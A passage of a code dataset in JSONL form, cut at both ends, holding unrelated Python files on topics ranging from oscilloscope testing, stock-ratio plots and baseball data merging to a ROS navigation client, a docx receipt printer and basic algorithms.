wf_file['programmingLanguage'] = programming_language_entity\n\n # based on ro-crate specification. 
for workflows: @type is an array with at least File and Workflow as values.\n wf_type = wf_file['@type']\n if not isinstance(wf_type, list):\n wf_type = [wf_type]\n if 'Workflow' not in wf_type:\n wf_type.append('Workflow')\n if 'SoftwareSourceCode' not in wf_type:\n wf_type.append('SoftwareSourceCode')\n wf_file['@type'] = wf_type\n\n\n # if the source is a remote URL then add https://schema.org/codeRepository property to it\n # this can be checked by checking if the source is a URL instead of a local path\n if 'url' in wf_file.properties().keys():\n wf_file['codeRepository'] = wf_file['url']\n\n # add extra files \n for file_entry in include_files:\n wf_crate.add_file(file_entry)\n \n return wf_crate\n\n","sub_path":"rocrate/rocrate_api.py","file_name":"rocrate_api.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"531107406","text":"#coding=utf-8\n\nimport pandas as pd\nimport numpy as np\nimport QRep\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\n\ndef plot_pev(secID_a,secID_h,start):\n \n a = QRep.get_pev(secID_a, start)\n h = QRep.get_pev(secID_h, start)\n h_a = h['pev'] / a['pev']\n h_a.dropna(inplace=True)\n #print(h_a[-5:])\n \n cmin = min(a['pev'].min(), h['pev'].min() , h_a.min())\n cmax = max(a['pev'].max(), h['pev'].max() , h_a.max())\n ymin = 1.0\n while ymin > cmin and ymin > 0.0:\n ymin = ymin - 0.2\n ymax =1.0\n while ymax < cmax:\n ymax = ymax + 0.2\n \n plt.figure(figsize=(20, 10), facecolor=(.94,.94,.94))\n plt.plot(a.index, a['pev'], label=secID_a[:-5], color='red')\n plt.plot(h.index, h['pev'], label=secID_h[:-5], color='green')\n plt.plot(h_a.index, h_a, label='{0}/{1}'.format(secID_h[:-5], secID_a[:-5] ) , color='black')\n \n plt.text(a.index[0] + pd.Timedelta('20 days'), ymax - 0.3* (ymax-ymin) , '{0}'.format( h_a[-5:] ), fontsize=10)\n \n plt.legend(loc=2,frameon=False, ncol= 5)\n plt.xlim( a.index[0] + pd.Timedelta('-10 days') , a.index[-1] + pd.Timedelta('10 days') )\n #plt.yscale(u'log')\n plt.yticks(np.arange(ymin,ymax,0.2))\n \n ax = plt.gca()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False) \n ax.set_facecolor((.94,.94,.94))\n ax.grid(b=True, axis='y', which='major', color='gray', linestyle='--', linewidth = 0.5)\n \n plt.tight_layout()\n mng = plt.get_current_fig_manager()\n mng.window.state('zoomed') #works fine on Windows!\n \n plt.show()\n\n\n#plot_pev('601088.XSHG','01088.XHKG','2010-01-01')\n\n#plot_pev('601318.XSHG','02318.XHKG','2012-01-01')\n#plot_pev('601601.XSHG','02601.XHKG','2015-01-01')\n#plot_pev('601336.XSHG', '01336.XHKG','2012-01-01')\n\n\n#plot_pev('601288.XSHG','01288.XHKG','2014-01-01')\n#plot_pev('600036.XSHG','03968.XHKG','2014-01-01')\n#plot_pev('601939.XSHG','00939.XHKG','2014-01-01')\n#plot_pev('600016.XSHG','01988.XHKG','2014-01-01')\n\n#plot_pev('601166.XSHG','601288.XSHG','2014-01-01')\nplot_pev('601288.XSHG','601939.XSHG','2012-01-01')\n#plot_pev('601169.XSHG','600016.XSHG','2012-01-01')\n#plot_pev('601601.XSHG', '601318.XSHG','2014-01-01')\n\n","sub_path":"Finpy/PEV.py","file_name":"PEV.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"202574600","text":"# OscilloscopeConnectionTest.py\n#\n# This example performs a connection test.\n#\n# Find more information on http://www.tiepie.com/LibTiePie .\n\nfrom __future__ import print_function\nimport time\nimport sys\nimport 
libtiepie\nfrom printinfo import *\n\n# Print library info:\nprint_library_info()\n\n# Enable network search:\nlibtiepie.network.auto_detect_enabled = True\n\n# Search for devices:\nlibtiepie.device_list.update()\n\n# Try to open an oscilloscope with connection test support:\nscp = None\nfor item in libtiepie.device_list:\n if item.can_open(libtiepie.DEVICETYPE_OSCILLOSCOPE):\n scp = item.open_oscilloscope()\n if scp.has_connection_test:\n break\n else:\n scp = None\n\nif scp:\n try:\n # Enable all channels that support connection testing:\n for ch in scp.channels:\n ch.enabled = ch.has_connection_test\n\n # Print oscilloscope info:\n print_device_info(scp)\n\n # Start connection test:\n scp.start_connection_test()\n\n # Wait for connection test to complete:\n while not scp.is_connection_test_completed:\n time.sleep(0.01) # 10 ms delay, to save CPU time\n\n # Get data:\n result = scp.get_connection_test_data()\n\n # Print result:\n print()\n print('Connection test result:')\n ch = 1\n for value in result:\n print('Ch' + str(ch) + ' = ' + str(value))\n ch += 1\n\n except Exception as e:\n print('Exception: ' + str(e))\n sys.exit(1)\n\n # Close oscilloscope:\n del scp\n\nelse:\n print('No oscilloscope available with connection test support!')\n sys.exit(1)\n\nsys.exit(0)\n","sub_path":"examples/OscilloscopeConnectionTest.py","file_name":"OscilloscopeConnectionTest.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"265651889","text":"import pandas as pd\n\n\ndef team_rename(name):\n if name == \"Dodgers\":\n return \"LAD\"\n if name == \"Red Sox\":\n return \"BOS\"\n if name == \"Brewers\":\n return \"MIL\"\n if name == \"Astros\":\n return \"HOU\"\n if name == \"Yankees\":\n return \"NYY\"\n if name == \"Braves\":\n return \"ATL\"\n if name == \"Indians\":\n return \"CLE\"\n if name == \"Rockies\":\n return \"COL\"\n if name == \"Cubs\":\n return \"CHC\"\n if name == \"Royals\":\n return \"KC\"\n if name == \"Mariners\":\n return \"SEA\"\n if name == \"Padres\":\n return \"SD\"\n if name == \"Mets\":\n return \"NYM\"\n if name == \"Twins\":\n return \"MIN\"\n if name == \"Reds\":\n return \"CIN\"\n if name == \"Angels\":\n return \"LAA\"\n if name == \"Giants\":\n return \"SF\"\n if name == \"Phillies\":\n return \"PHI\"\n if name == \"Orioles\":\n return \"BAL\"\n if name == \"Diamondbacks\":\n return \"ARI\"\n if name == \"White Sox\":\n return \"CWS\"\n if name == \"Cardinals\" or name == \"St.Louis Cardinals\":\n return \"STL\"\n if name == \"Blue Jays\":\n return \"TOR\"\n if name == \"Nationals\":\n return \"WSH\"\n if name == \"Athletics\":\n return \"OAK\"\n if name == \"Rangers\":\n return \"TEX\"\n if name == \"Pirates\":\n return \"PIT\"\n if name == \"Marlins\" or name == \"Florida Marlins\":\n return \"MIA\"\n if name == \"Tigers\":\n return \"DET\"\n if name == \"Rays\":\n return \"TB\"\n else:\n print(\"No name match found for \"+name)\n return \"\"\n\n# if __name__ == '__main__':\n# new_home = []\n# df = pd.read_csv('pitcher_data.csv')\n# for i in df['Team']:\n# b = team_rename(i)\n# new_home.append(b)\n# df['Team'] = pd.DataFrame(new_home)\n# print(df)\n# df.to_csv('pitcher_data.csv',index=False)\n\n# df = pd.read_csv('games.csv')\n# df2 = pd.read_csv('id_map.csv')\n# print(df2)\n# print(df)\n#\n# df.playerid = df.playerid.astype(str)\n# df2.IDFANGRAPHS = df2.IDFANGRAPHS.astype(str)\n# df2.MLBID = df2.MLBID.astype(str)\n#\n# df3 = pd.merge(df, df2, left_on=['playerid'], 
right_on=['IDFANGRAPHS'],how='left')\n# df3.to_csv('batter_data.csv',index=False)\n\n# print(df)\n# away = []\n# home = []\n# for i in df['matchup']:\n# a = i.split('@')[0]\n# away.append(a)\n# b = i.split('@')[1]\n# home.append(b)\n# df['home'] = pd.DataFrame(home)\n# df['away'] = pd.DataFrame(away)\n#\n# print(df)\n# df.to_csv('games.csv',index=False)\n# df2 = pd.read_csv('demo.csv')\n# print(df2)\n# df3 = pd.merge(df, df2, left_on=['date','home','away','umpire_K/BB'], right_on=['date','team_home','team_away','umpire_K/BB'],how='left')\n#\n# print(df3)\n# #df3.to_csv('demo_games.csv',index=False)\n#\n# df3.drop_duplicates( subset=None,keep='first', inplace=True)\n# df3.to_csv('demo_games.csv',index=False)\n\n\ndf = pd.read_csv('demo_games.csv',dtype={'home_pitcher':str,'season':str})\ndf2 = pd.read_csv('./player_data/pitcher_data.csv',dtype={'ID':str,'Season':str})\n\n\n# season=[]\n# for sea in df['date']:\n# season.append(sea[0:4])\n# df['season'] = pd.DataFrame(season)\n# df.to_csv('demo_games.csv')\nprint(df.columns)\nprint('\\n',df2.columns)\n#\n#\n\n\n# df.home_pitcher = df.home_pitcher.astype(str)\n# df.season = df.season.astype(str)\n# df2.Season = df2.Season.astype(str)\n# df2.ID = df2.ID.map(lambda x : ('%.0f')%x ).astype(str)\n\nprint(df.home_pitcher)\nprint(df.season)\nprint(df2.Season)\nprint(df2.ID)\nprint(df2)\n#\n# new = []\n# for i in df2.ID:\n# new.append(i[0:6])\n# df2.ID = pd.DataFrame(new).astype(int)\n# df2.to_csv('./player_data/pitcher_data.csv',index=False)\n# print(df2.ID)\n#\n#\ndf3 = pd.merge(df, df2, left_on=['season','home_pitcher'], right_on=['Season','ID'],how='left')\n\nprint(df3)\ndf3.to_csv('./testttttt.csv',index=False)\n","sub_path":"data_engineering/tm_transform.py","file_name":"tm_transform.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"533036323","text":"# Copyright 2014 Mirantis Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import print_function\n\nfrom oslo_config import cfg\n\nfrom tempest import config # noqa\n\nservice_available_group = cfg.OptGroup(name=\"service_available\",\n title=\"Available OpenStack Services\")\n\nServiceAvailableGroup = [\n cfg.BoolOpt(\"watcher\",\n default=True,\n help=\"Whether or not watcher is expected to be available\"),\n]\n\n\nclass TempestConfigProxyWatcher(object):\n \"\"\"Wrapper over standard Tempest config that sets Watcher opts.\"\"\"\n\n def __init__(self):\n self._config = config.CONF\n config.register_opt_group(\n cfg.CONF, service_available_group, ServiceAvailableGroup)\n self._config.share = cfg.CONF.share\n\n def __getattr__(self, attr):\n return getattr(self._config, attr)\n\n\nCONF = TempestConfigProxyWatcher()\n","sub_path":"watcher/contrib/tempest/tempest/config_infra_optim.py","file_name":"config_infra_optim.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89121578","text":"\nfrom django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.user_login, name='login'),\n path('register/', views.user_register, name='register'),\n path('dashboard/', views.dashboard, name='dashboard'),\n path('logout/', views.user_logout, name='logout'),\n path('fetch/', views.fetch, name='fetch'),\n path('block//', views.block, name='block'),\n path('ignore//', views.ignore, name='ignore'),\n path(\"submit/\", views.submit, name='submit'),\n path(\"course/print\", views.print_form, name='print_form'),\n path(\"course/registration\", views.reg_form, name='reg_form'),\n]\n","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"405118091","text":"#!/usr/bin/python\n\n#REQUIRES: novoalign and samtools\n#REQUIRES: a map file, with first column as sample ID, and second column as which fasta it goes to. 
The reason you have different fastas for different samples is because of divergent mtDNA genomes\n#elements in the map file are separated by a tab\n\n#This script aligns your paired and unpaired reads to a reference using novoalign, and makes a pileup file using samtools\n\nimport os\nimport sys\nimport argparse\nimport multiprocessing\nfrom Bio.Nexus import Nexus\n\ndef align(element):\n\n\tvariables = dict(\n\tthefile = element,\n\tnewfile = element[:-5] + 'nexus'\n\t) #name your output\n\n\tcommands = \"\"\"\n\tpython fasta2Nexus.py {thefile} {newfile}\n\t\"\"\".format(**variables)\n\n\tcmd_list = commands.split(\"\\n\")\n\tfor cmd in cmd_list:\n\t\tos.system(cmd)\n\nthedir = [f for f in os.listdir('.') if os.path.isfile(f)]\n\nfile_list = []\n\nfor thing in thedir:\n\tif '_analyze.fasta' in thing:\n\t\talign(thing)\n\t\tfile_list.append(thing[:-5] + 'nexus')\n\n\nnexi = [(fname, Nexus.Nexus(fname)) for fname in file_list]\n\ncombined = Nexus.combine(nexi)\ncombined.write_nexus_data(filename=open(sys.argv[1], 'w'))\n","sub_path":"14treebuilding/concatenatedFile.py","file_name":"concatenatedFile.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"362025640","text":"import re\nimport heapq\n\n\nclass HeapqObj(object):\n def __init__(self, word, cnt):\n self.word = word\n self.cnt = cnt\n\n def __lt__(self, other):\n \"\"\" if cnt is equal for ['newshop', 'shopnow'],\n put shopnow on top of heap as a smallest object\n \"\"\"\n return (self.cnt < other.cnt) or self.cnt == other.cnt and self.word > other.word\n\n def __str__(self):\n return self.word\n\nimport operator\ndef topCompetitors(topNCompetitors, competitors, reviews):\n aggr = {cmp: 0 for cmp in competitors}\n for cmp in competitors:\n for rev in reviews:\n # use re to find a match, because competitor may appear in a review as: 'cmp,' or 'Cmp'\n match = re.findall(cmp, rev, re.IGNORECASE)\n aggr[cmp] += len(match)\n # if match:\n\n print(aggr)\n heap = []\n for cmp, cnt in aggr.items():\n obj = HeapqObj(cmp, cnt)\n heapq.heappush(heap, obj)\n print([(obj.word, obj.cnt) for obj in heap])\n if len(heap) > topNCompetitors:\n heapq.heappop(heap)\n\n print([(obj.word, obj.cnt )for obj in sorted(heap, reverse=True, key=operator.attrgetter('cnt'))])\n return [obj.word for obj in sorted(heap, reverse=True, key=operator.attrgetter('cnt'))]\n\n\n# ans = topCompetitors(2,\n# ['newshop', 'mymarket', 'shopnow'],\n# ['newshop is newshop', 'shopnow shopnow', 'mymarket is gre mymarket mymarket mymarket', 'dsfhds'])\n# assert ans == ['mymarket', 'newshop'], ans\n#\n\ncomp = [\n\"anacell\",\n\"betacellular\",\n\"cetracular\",\n\"deltacellular\",\n\"eurocell\",\n]\nrev = [\n\"I love anacell Best services provided by anacell in the town\",\n\"betacellular has great services\",\n\"deltacellular provides much better services than betacellular\",\n\"cetracular is worse than eurocell\",\n\"betacellular is better than deltacellular\",\n]\n\nans = topCompetitors(2, comp, rev)\nprint(ans)","sub_path":"python/examples/leetcode/amazon/top-n-competitors.py","file_name":"top-n-competitors.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"144596378","text":"class NumMatrix(object):\n def __init__(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n \"\"\"\n if not matrix:\n return\n self.m, self.n = len(matrix), len(matrix[0])\n self.tree, self.nums = [[0] * 
(self.n + 1) for _ in range(self.m + 1)], [[0] * self.n for _ in range(self.m)]\n for i in range(self.m):\n for j in range(self.n):\n self.update(i, j, matrix[i][j])\n\n def update(self, row, col, val):\n \"\"\"\n :type row: int\n :type col: int\n :type val: int\n :rtype: void\n \"\"\"\n if self.m == 0 or self.n == 0:\n return\n delta = val - self.nums[row][col]\n self.nums[row][col] = val\n if delta == 0:\n return\n i = row + 1\n while i <= self.m:\n j = col + 1\n while j <= self.n:\n self.tree[i][j] += delta\n j += j & (-j)\n i += i & (-i)\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n return self.accu(row2 + 1, col2 + 1) - self.accu(row2 + 1, col1) - self.accu(row1, col2 + 1) + self.accu(row1, col1)\n\n def accu(self, row, col):\n i, ans = row, 0\n while i > 0:\n j = col\n while j > 0:\n ans += self.tree[i][j]\n j -= j & (-j)\n i -= i & (-i)\n return ans\n\nif __name__ == \"__main__\":\n m = NumMatrix([[3,0,1,4,2],[5,6,3,2,1],[1,2,0,1,5],[4,1,0,1,7],[1,0,3,0,5]])\n print(m.sumRegion(2,1,4,3))\n pass\n","sub_path":"rangeSumQuery2DMutable.py","file_name":"rangeSumQuery2DMutable.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"394904314","text":"import nltk\nimport pandas as pd\nimport numpy as np\n\"\"\"\nHelper functions for data mining lab session 2018 Fall Semester\nAuthor: Elvis Saravia\nEmail: ellfae@gmail.com\n\"\"\"\n\ndef format_rows(docs):\n \"\"\" format the text field and strip special characters \"\"\"\n D = []\n for d in docs.data:\n temp_d = \" \".join(d.split(\"\\n\")).strip('\\n\\t')\n D.append([temp_d])\n return D\n\ndef format_labels(target, docs):\n \"\"\" format the labels \"\"\"\n return docs.target_names[target]\n\ndef check_missing_values(row):\n \"\"\" function that checks whether there are missing values in the dataframe \"\"\"\n counter = 0\n for element in row:\n if element == True:\n counter+=1\n return (\"The amount of missing records is: \", counter)\n\ndef tokenize_text(text, remove_stopwords=False):\n \"\"\"\n Tokenize text using the nltk library\n \"\"\"\n tokens = []\n for d in nltk.sent_tokenize(text, language='english'):\n for word in nltk.word_tokenize(d, language='english'):\n # filters here\n tokens.append(word)\n return tokens\n#-------------------------------------------------------------Mine---------------------\ndef sentence_preprocessing(Analyzer, Sentences):\n corpus = []\n for s in list(Sentences):\n tokens = Analyzer(s)\n string = ' '\n corpus.append(string.join(tokens))\n return corpus\n\nclass DatasetGenerator:\n\n def __init__(self):\n \n self.sentences = []\n self.labels = []\n \n def add_data(self, PATH):\n \n input_file = open(PATH, 'r', encoding=\"utf-8\")\n\n for line in input_file:\n line = line.strip()\n ss = line.split('\\t')\n self.sentences.append(ss[0])\n self.labels.append(ss[1])\n \n def get_pandas_dataframe(self):\n \n Combined = [self.sentences, self.labels]\n Combined = np.array(Combined).T\n \n df = pd.DataFrame(Combined, columns=['Sentences', 'Labels'])\n \n return df\n","sub_path":"helpers/data_mining_helpers.py","file_name":"data_mining_helpers.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"293178094","text":"import os\r\nimport sys\r\nfrom docx import Document\r\nfrom docx.shared import Inches\r\nimport 
pyqrcode\r\n#from docx.enum.style import WD_STYLE_TYPE\r\n\r\ndir = os.path.dirname(__file__)\r\n\r\n\r\n\r\nclass NewReceipt(object):\r\n def __init__(self):\r\n\r\n #loads template file\r\n \r\n## print dir\r\n## print path\r\n self.document = Document(os.path.join(dir,'receiptTemplate.docx'))\r\n\r\n \r\n # sets default reciept settings\r\n self.details = {\r\n 'recipeName':'no name',\r\n 'recipeDescription':'no description',\r\n 'recipeURL':'no url',\r\n 'recipeCode':'no code',\r\n 'nestleProduct':'no product',\r\n 'servingSize':'no serving size',\r\n 'ingredients':[],\r\n 'aisles':[],\r\n 'aisleNames':[],\r\n 'aisleIDs':[]\r\n }\r\n \r\n def check(self):\r\n if len(self.details['ingredients']) != len(self.details['aisles']):\r\n raise ValueError('ingredients and aisles should be the same length')\r\n \r\n \r\n\r\n \r\n def updateDoc(self):\r\n \r\n # update simple text\r\n for key in self.details:\r\n placeholder = ':'+key+':'\r\n #print placeholder\r\n\r\n for p in self.document.paragraphs:\r\n if not placeholder in p.text:\r\n continue\r\n else:\r\n## print key\r\n## print '---------',self.details[key]\r\n p.text = p.text.replace(placeholder,self.details[key])\r\n\r\n # Update servings icons\r\n\r\n\r\n for p in self.document.paragraphs:\r\n if not ':servingIcons:' in p.text:\r\n continue\r\n\r\n## p.text = p.text.replace(':servingIcons:',str(ss))\r\n \r\n ss = self.details['servingSize']\r\n## print ss\r\n if ss>4:\r\n p.text = p.text.replace(':servingIcons:',ss)\r\n \r\n## p.text = p.text.replace(':servingIcons:',str(ss)+' x ')\r\n## r = p.add_run()\r\n## r.add_picture('person.png',width=Inches(.15))\r\n \r\n \r\n else:\r\n p.text = p.text.replace(':servingIcons:','')\r\n r = p.add_run()\r\n person = os.path.join(dir, 'person.png')\r\n for i in range(0,ss):\r\n r.add_picture(person,width=Inches(.15)) \r\n \r\n break\r\n \r\n\r\n # create shopping list\r\n # find where to place it\r\n for p in self.document.paragraphs:\r\n if not ':shoppingList:' in p.text:\r\n continue\r\n \r\n p.text = p.text.replace(':shoppingList:','')\r\n break\r\n\r\n\r\n\r\n # loop through the aisles\r\n \r\n for i in range(0,len(self.details['aisleIDs'])):\r\n aisleID = self.details['aisleIDs'][i]\r\n aisleName = self.details['aisleNames'][i]\r\n p.insert_paragraph_before(aisleName,style='Heading 1')\r\n\r\n for j in range(0,len(self.details['aisles'])):\r\n aisle = self.details['aisles'][j]\r\n ingredient = self.details['ingredients'][j]\r\n if not aisle == aisleID:\r\n continue\r\n p.insert_paragraph_before(ingredient,style='List Paragraph')\r\n \r\n # Insert QR code\r\n qr_path = os.path.join(dir, 'qr.png')\r\n \r\n qr = pyqrcode.create(self.details['recipeURL'],error='M')\r\n qr.png(qr_path,scale=5)\r\n\r\n for p in self.document.paragraphs:\r\n if not ':QR:' in p.text:\r\n continue\r\n \r\n p.text = p.text.replace(':QR:','')\r\n break\r\n r = p.add_run()\r\n \r\n r.add_picture(qr_path,width=Inches(1.5))\r\n\r\n \r\n def send2printer(self):\r\n # make sure the file is ready to print\r\n self.check()\r\n self.updateDoc()\r\n\r\n # delete old recipe and save new one\r\n## path = os.path.dirname(sys.argv[0])\r\n## tmp = path+'/temp.docx';\r\n tmp = os.path.join(dir, 'temp.docx')\r\n if os.path.isfile(tmp): \r\n os.remove(tmp)\r\n self.document.save(tmp)\r\n\r\n os.startfile(tmp, \"print\")\r\n #os.startfile(tmp)#savePaper\r\n\r\n\r\n def send2file(self):\r\n # make sure the file is ready to print\r\n self.check()\r\n self.updateDoc()\r\n\r\n # delete old recipe and save new one\r\n## path = 
os.path.dirname(sys.argv[0])\r\n## tmp = path+'/temp.docx';\r\n tmp = os.path.join(dir, self.details['ID']+'.docx')\r\n if os.path.isfile(tmp): \r\n os.remove(tmp)\r\n self.document.save(tmp)\r\n\r\n\r\n \r\n\r\n\r\n#######\r\n","sub_path":"lib/printerToolbox.py","file_name":"printerToolbox.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"4612073","text":"import noiseInverse\nimport mapPCG\n\nclass mapNoiseFilter( mapPCG.pcgFilter ):\n def __init__( self, m, p2dNoise ):\n self.m = m\n self.p2d = p2dNoise\n def applyFilter( self ):\n filtMap0 = noiseInverse.nInverseMap(self.m,self.p2d,kMask=self.p2d.kMask,showNInverse=False, \\\n noiseFloorAsPercOfMax = 2.0)\n self.m.data[:] = filtMap0.data[:]\n\n","sub_path":"flipper/mapPCGFilter.py","file_name":"mapPCGFilter.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"529074466","text":"# quicksort.py by Aidan Nelson, February 15, 2012.\n# a quicksorting algorithm. \n\n# a function to swap two items in a list:\ndef swap_items(the_list, a, b): \n temp = the_list[a]\n the_list[a] = the_list[b]\n the_list[b] = temp\n\n# a partitioning function to be used in quicksort:\ndef partition(the_list, p, r, compare_function):\n # set position of indices for less-than-or-equal and greater-than the pivot point.\n i = p - 1\n j = p\n # set value for pivot:\n pivot = the_list[r]\n \n while j != r:\n # if the value at index j is less than or equal to the value of pivot, \n # swap that value into the less-than-pivot section at the_list[:i+1]\n if compare_function(the_list[j], pivot):\n i += 1\n swap_items(the_list, i, j)\n # keep index j moving towards the pivot point\n j += 1\n # move the pivot point item to the pivot point between sections of the list\n # less-than-or-equal and greater-than itself\n swap_items(the_list, i + 1, r)\n \n #return the index of the pivot point\n return i + 1\n \n \n# quicksort function:\ndef quicksort(the_list, p, r, compare_function):\n # if we have a list of more than one item, continue to quick sort:\n if not len(the_list[p:r + 1]) < 2:\n \n # partition the list and set value of pivot index to q\n q = partition(the_list, p, r, compare_function)\n \n # recursively quick sort each section (below pivot and above pivot)\n quicksort(the_list, p, q - 1, compare_function)\n quicksort(the_list, q + 1, r, compare_function)\n \n\n","sub_path":"elevation_mapping/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"104558900","text":"import sys\nimport heapq\n\nnumbers = int(input())\nheap = []\n\n# Max heap\n# because the heappop() function returns the smallest value,\n# multiply that smallest value by -1\n# to turn it into the largest number and print it\n\nfor _ in range(numbers):\n num = int(sys.stdin.readline())\n if num != 0:\n heapq.heappush(heap, (-num))\n else:\n try:\n print(-1 * heapq.heappop(heap))\n except:\n print(0)\n\n","sub_path":"BaekJoon/최대_힙.py","file_name":"최대_힙.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535454006","text":"#! 
/usr/bin/env python\n\n# uses the move base actionlib service\n# call this client to go home\n\nfrom __future__ import print_function\n\nimport rospy\n# Brings in the SimpleActionClient\nimport actionlib\n# Brings in the messages used by the move_base action, including the\n# goal message and the result message.\nimport magni_2dnav.msg\nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal\n\ndef go_home_client():\n # Creates the SimpleActionClient, passing the type of the action\n # (MoveBaseAction) to the constructor.\n #client = actionlib.SimpleActionClient('go_home', actionlib_tutorials.msg.GoHomeAction)\n client = actionlib.SimpleActionClient('move_base',MoveBaseAction)\n\n # Waits until the action server has started up and started\n # listening for goals.\n print('waiting for server to be started')\n client.wait_for_server()\n print('creating goal')\n # Creates a goal to send to the action server.\n goal = MoveBaseGoal()\n goal.target_pose.header.frame_id = \"map\"\n goal.target_pose.header.stamp = rospy.Time.now()\n goal.target_pose.pose.position.x = 7.331\n goal.target_pose.pose.position.y = -0.694\n goal.target_pose.pose.position.z = 0.0\n goal.target_pose.pose.orientation.x = 0.0\n goal.target_pose.pose.orientation.y = 0.0\n goal.target_pose.pose.orientation.z = 0.549\n goal.target_pose.pose.orientation.w = 0.836\n print('sending goal')\n\n client.send_goal(goal)\n wait = client.wait_for_result()\n if not wait:\n rospy.logerr(\"Action server not available!\")\n rospy.signal_shutdown(\"Action server not available!\")\n else:\n return client.get_result()\n\nif __name__ == '__main__':\n try:\n # Initializes a rospy node so that the SimpleActionClient can\n # publish and subscribe over ROS.\n rospy.init_node('go_home_client_py')\n result = go_home_client()\n if result:\n rospy.loginfo('We went home!')\n except rospy.ROSInterruptException:\n rospy.loginfo(\"program interrupted before completion\")\n","sub_path":"magni_2dnav/scripts/clients/go_home_client.py","file_name":"go_home_client.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"82772438","text":"from utils import add_trademark, process_text, modify_text\n\nLOCAL_HOST, LISTEN_PORT = '127.0.0.1', 9000\nTARGET_HOST = 'https://habrahabr.ru'\n\n\ndef test_add_trademark():\n word, tm = \"foo\", \"\\u2122\"\n assert add_trademark(word) == f\"{word}{tm}\"\n\n\ndef test_process_text():\n tm = \"\\u2122\"\n text = \"У Google новые смартфоны, наушники, камера\"\n result = f\"У Google{tm} новые смартфоны, наушники, камера{tm}\"\n assert isinstance(process_text(text), str)\n assert process_text(text) == result\n\n\ndef test_modify_text():\n url = \"https://habrahabr.ru\"\n assert isinstance(modify_text(url), bytes)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"124728742","text":"\"\"\"Try to replicate my bash environment\"\"\"\n\n\nfrom pysyte.paths import environ_path\n\n\ndef _environ_dir(name):\n \"\"\"Find the path in environment and convert to a Path\n\n or None if not found\n\n >>> _environ_dir('HOME').isdir()\n True\n \"\"\"\n try:\n result = environ_path(name)\n except KeyError:\n return None\n if not (result.isdir() or result.isfile()):\n return None\n return result\n\n\ndef _load_environment_paths():\n \"\"\"Look for expected paths in environment\n\n Put them in module globals\n 
\"\"\"\n jab_paths = [\n 'HOME', 'PYTHON']\n for _ in jab_paths:\n globals()[_] = _environ_dir(_)\n\ntry:\n _ = HOME # pylint: disable=undefined-variable\nexcept NameError:\n _load_environment_paths()\n","sub_path":"src/python/pyjab/jab/environ.py","file_name":"environ.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"84972476","text":"import sys\nsys.path.append('..')\nfrom SVG import SVG\n\n\nw = 300\nh = 300\n\n\ns = SVG(w,h)\n\ns.line(w/2,0,w/2,h)\ns.line(0,h/2,w,h/2)\n\nfor x in range(-10,10):\n # upper\n s.line((x+10)*w/20, h/2, w/2, abs(x)*h/20)\n # lower\n s.line((x+10)*w/20, h/2, w/2, -(abs(x)-10)*h/20+h/2)\n","sub_path":"01/b-svg.py","file_name":"b-svg.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"75735579","text":"\"\"\"\n 给定一个链表,两两交换其中相邻的节点,并返回交换后的链表。\n 你不能只是单纯的改变节点内部的值,而是需要实际的进行节点交换。\n\n 示例:\n 给定 1->2->3->4, 你应该返回 